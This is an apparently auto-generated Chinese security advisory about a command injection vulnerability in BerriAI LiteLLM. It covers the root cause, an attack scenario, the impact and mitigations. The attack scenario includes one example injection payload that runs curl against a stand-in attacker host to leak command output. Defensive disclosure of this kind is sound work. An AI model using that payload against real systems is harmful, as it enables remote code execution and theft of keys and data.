📋 漏洞概述

BerriAI LiteLLM存在命令注入漏洞，允许低权限认证用户通过构造恶意输入在主机上执行任意命令。

📋 基础信息

🔬 漏洞根因

漏洞源于LiteLLM在处理用户输入的模型名称、请求参数或API端点时，未充分验证和过滤特殊字符，导致用户可控的字符串直接拼接到系统命令（如调用子进程执行curl、wget或其他命令行工具）中。攻击者可通过注入管道符、分号、反引号等shell元字符，突破预期命令边界，实现任意命令执行。此外，低权限internal-user key仍可使用部分管理接口，扩大了攻击面。

🎯 攻击场景

1. 攻击者通过合法方式获取一个低权限internal-user API key（例如通过公开注册、泄露或弱认证）。2. 攻击者构造恶意请求，在例如`model`、`provider`、`endpoint`等字段中插入命令注入Payload（如`; curl http://attacker.com/$(whoami)`）。3. 请求被LiteLLM服务接收，后端处理时将该用户输入拼接到系统命令（例如用于调用外部模型的shell脚本）中。4. 系统执行恶意命令，攻击者获得主机shell权限。5. 攻击者利用该权限进行后续横向移动、数据窃取或勒索软件部署。

💥 漏洞影响

成功利用可导致远程代码执行(RCE)，攻击者能完全控制LiteLLM运行主机，窃取所有API密钥、模型数据、用户信息，并可横向攻击内部网络。影响所有使用该产品作为AI网关或代理的企业。

🛡️ 修复建议

1. 立即升级到BerriAI官方修补版本（如晚于2026-03-01的LiteLLM版本）。2. 临时缓解措施：在Web应用防火墙(WAF)中添加规则拦截`;`、`|`、`&`、`$()`等shell特殊字符；限制API key权限，禁止低权限key访问管理接口；对用户输入进行白名单校验而非黑名单过滤。

📎 参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2026-42271
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42271
• 原始来源（CISA-KEV）

🚨 威胁评估

⚠️ 本文由漏洞情报系统自动生成，仅供安全研究与防御参考。生成时间: 2026-06-11 08:09 | 来源: CISA-KEV